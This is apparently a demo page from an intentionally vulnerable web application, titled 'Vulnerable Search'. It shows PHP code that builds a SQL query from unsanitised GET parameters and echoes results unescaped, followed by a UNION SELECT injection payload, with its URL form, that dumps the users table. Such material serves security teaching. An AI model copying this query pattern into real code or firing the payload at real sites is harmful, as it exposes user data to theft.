Vulnerable Search



#ID Title Author

Query Executed:


          

PHP Code:

if ($_GET['all'] == 1)
{
    $query = "SELECT * FROM books;";
}
else if ($_GET['title'] || $_GET['author'])
{
    $query = sprintf("SELECT * FROM books WHERE title = '%s' OR author = '%s';",
                             $_GET['title'],
                             $_GET['author']);
}

if ($query != null)
{
    $result = mysqli_query($connection, $query);

    while (($row = mysqli_fetch_row($result)) != null)
    {
        printf("<tr><td>%s</td><td>%s</td><td>%s</td></tr>", $row[0], $row[1], $row[2]);
    }
}
            

Vulnerability:

Pass ' UNION SELECT * FROM users WHERE '1'='1 as author to get all users data.
The same result is obtained by using url books1.php?author='+UNION+SELECT+*+FROM+users+WHERE '1'='1.